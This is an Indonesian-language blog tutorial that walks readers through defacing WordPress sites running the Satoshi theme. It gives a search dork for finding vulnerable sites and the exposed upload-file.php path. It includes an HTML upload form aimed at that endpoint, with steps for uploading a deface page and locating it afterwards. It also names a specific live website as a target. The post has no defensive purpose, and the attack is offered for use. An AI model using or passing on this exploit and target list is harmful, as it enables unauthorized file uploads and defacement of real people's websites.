Tutorial Deface Metode Wordpress Satoshi Theme.
Selasa, 11 Februari 2020
Tambah Komentar
Hallo Sobat Sobat razzer kali ini saya akan membagikan tutorial Deface Metode Wordpress Satoshi Theme. Oke langsung saja kita kaga perlu banyak omong ya teman teman.
Bahan Bahan Yang Harus Kalian Perlukan.
- Hp/Pc
- Internet
Untuk Dork Nya :
inurl:/wp-content/themes/satoshi/
Exploit :
/wp-content/themes/satoshi/upload-file.php
Csrf :
<form enctype="multipart/form-data"
action="http://target.com/wp-content/themes/satoshi/upload-file.php" method="post">
File Lu Ya Oke: <input name="uploadfile" type="file" /><br />
<input type="submit" value="Kentot Saja" />
</form
Step 1 :
Kalian dorking dulu dengan Dork diatas, lalu kalian pilih salah 1 web.
Step 2 :
Apabila kalo kalian sudah pilih web nya maka kalian masukkan xploit nya.
Contoh :
https://target.com/wp-content/themes/satoshi/upload-file.php.
Step 3 :
Nah kalo error itu tanda nya Vuln ya teman teman bukan nya ga bisa itu vuln.
Step 4 :
Lalu kalian pergi ke notepad kalian atau text editor kalian. Lalu kalian masukkin Csrf nya contoh gambar di bawah.
Step 5 :
Lalu kalian Save dengan (Ekstensi html). Nah kalo kalian sudah save lalu kalian pergi ke folder kalian maka kalian cara nama folder yang csrf nya.
Step 6 :
Nah lalu kalian masukkan Script Deface kalian dengan ekstensi html. Lalu kalian Klik Upload maka hasil nya seperti gambar di bawah.
Step 7 :
Nah kalo ada ada bacaan sukses, langsung kita panggil akses nya dengan /wp-content/themes/satoshi/images/namafilesc.html
Contoh :
https://target.com/wp-content/themes/satoshi/images/namafilesc.html
Live target : http://wordsmyth.se/wp-content/themes/satoshi/upload-file.php
Good Luck!!
Belum ada Komentar untuk "Tutorial Deface Metode Wordpress Satoshi Theme."
Posting Komentar